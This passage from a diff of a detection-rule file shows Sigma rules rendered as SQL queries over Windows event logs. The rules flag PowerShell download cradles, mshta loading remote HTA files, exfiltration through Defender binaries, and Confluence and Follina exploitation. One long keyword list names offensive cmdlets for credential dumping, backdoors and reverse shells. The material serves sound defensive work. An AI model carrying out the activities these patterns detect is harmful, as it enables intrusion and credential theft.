"attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_keylogger_activity.yml" + "filename": "posh_pc_susp_download.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "title": "Alternate PowerShell Hosts", + "id": "d7326048-328b-4d5e-98af-86e84b17c765", "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND 
NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Windows Screen Capture with CopyFromScreen", - "id": "d4a11f63-2390-411c-9adf-d791fd152830", - "status": "experimental", - "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", - "author": "frack113", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "status": "test", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_capture_screenshots.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Import PowerShell Modules From Suspicious Directories", - "id": 
"21f9162c-5f5d-4b01-89a8-b705bd7d10ab", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Detects powershell scripts that import modules from suspicious directories", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate \".xbap\" being executed via \"PresentationHost\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR ScriptBlockText LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR 
OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "posh_ps_import_module_susp_dirs.yml" + "filename": "proc_creation_win_lolbin_presentationhost.yml" }, { - "title": "Powershell Execute Batch Script", - "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", - "status": "test", - "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Legitimate administration script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_execute_batch_script.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.impact", - "attack.t1565" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' 
OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Service Registry Permissions Weakness Check", - "id": "95afc12e-3cbb-40c3-9340-84a032e596a3", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "status": "experimental", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-acl%' ESCAPE '\\' AND ScriptBlockText LIKE '%REGISTRY::HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_acl_service.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "status": "experimental", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. 
All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "status": "experimental", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR 
ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE 